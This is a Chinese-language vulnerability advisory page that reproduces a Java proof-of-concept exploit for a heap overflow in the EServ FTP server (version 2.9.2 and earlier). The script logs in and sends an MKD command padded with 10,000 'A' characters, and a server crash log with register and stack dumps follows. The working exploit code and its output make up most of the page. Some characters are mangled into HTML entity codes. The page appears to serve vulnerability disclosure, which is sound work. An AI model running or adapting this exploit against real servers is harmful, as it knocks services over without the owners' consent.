? 洞 描 述:
ESERV在处理日志里的长字符时,存在一个远程溢出漏洞,下面是用
java写的测试
程序:
/* Proof of concept code for the heap overflow in EServ $#@60;=
2.9.2
* Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
*/
import java.io.*;
import java.net.*;
class eservheap {
public static void main(String[] args) throws IOException
{
if (args.length $#@60; 1) {
System.out.println("Syntax: java eservheap [host] $#@60;user$#@62;
$#@60;pass$#@62;");
System.exit(1); }
Socket soq = null;
PrintWriter white = null;
BufferedReader weed = null;
try {
soq = new Socket(args[0], 21);
white = new PrintWriter(soq.getOutputStream(), true);
weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }
weed.readLine();
String juzer = (args.length == 3) ? ("USER " + args[1])
: "USER anonymous";
String pasz = (args.length == 3) ? ("PASS " + args[2])
: "PASS mdma";
white.println(juzer + "\n" + pasz);
weed.readLine();
weed.readLine();
white.print("MKD ");
for (int i = 0; i $#@60; 10000; i++) white.print("A");
white.println(); // uNf! Who yoh daddy, bitch?
weed.readLine();
white.println("QUIT"); } }
下面的e.log显示了这个溢出的后果:
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00
Pb4.6]N.?_4....
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00
éü..A...H??.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00
.....F..._??.#...
/* Ie. Thread crashes on MKD, but has no effect on other threads
*/
USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C r>
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC $#@60;not in the image$#@62;
1C5EEAC : 7FFFD8F4 $#@60;not in the image$#@62;
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 $#@60;not found$#@62;
1C5EEC0 : 339DE8 $#@60;not found$#@62;
1C5EEC4 : 270C $#@60;not found$#@62;
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 $#@60;not in the image$#@62;
相关文章